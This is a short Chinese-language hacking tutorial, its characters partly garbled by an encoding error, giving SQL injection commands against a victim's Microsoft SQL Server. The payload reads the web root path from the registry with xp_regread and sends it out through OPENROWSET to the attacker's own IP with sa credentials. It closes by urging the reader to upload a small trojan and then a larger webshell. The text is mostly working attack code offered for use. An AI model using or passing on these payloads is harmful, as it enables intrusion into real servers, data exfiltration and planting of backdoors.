在對(duì)方執(zhí)行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密碼'', ''select * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--
這樣fenggou這個(gè)表里就會(huì)有這樣一條記錄select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a
不用說(shuō),''D:\WEB"就是從注冊(cè)表里讀出的物理路徑拉.然后執(zhí)行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--
等于執(zhí)行了select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a
OK,這時(shí)你在你機(jī)器上SQL事件追蹤器上就會(huì)顯示select * FROM pubs.dbo.authors where au_fname='D:\WEB,,1' 哇 哈哈哈哈哈 物理路徑到手了 寫(xiě)小馬傳大馬吧~
